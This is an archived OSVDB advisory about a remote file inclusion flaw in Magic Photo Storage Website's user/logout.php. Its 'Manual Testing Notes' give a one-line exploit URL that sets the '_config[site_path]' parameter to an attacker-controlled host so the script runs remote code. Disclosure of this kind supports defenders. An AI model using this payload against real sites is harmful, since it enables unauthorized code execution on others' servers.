Magic Photo Storage Website user/logout.php _config[site_path] Variable Remote File Inclusion

2007-01-08T01:15:28
ID OSVDB:33433
Type osvdb
Reporter IbnuSina(emel_gw_ini@yahoo.com)
Modified 2007-01-08T01:15:28

Description

Vulnerability Description

Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the user/logout.php script not properly sanitizing user input supplied to the '_config[site_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the user/logout.php script not properly sanitizing user input supplied to the '_config[site_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/path/user/logout.php?_config[site_path]=http://[attacker]?

References:

Vendor URL: http://www.scriptaty.net/magic-photo-storage-website.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0243.html CVE-2007-0182 Bugtraq ID: 21965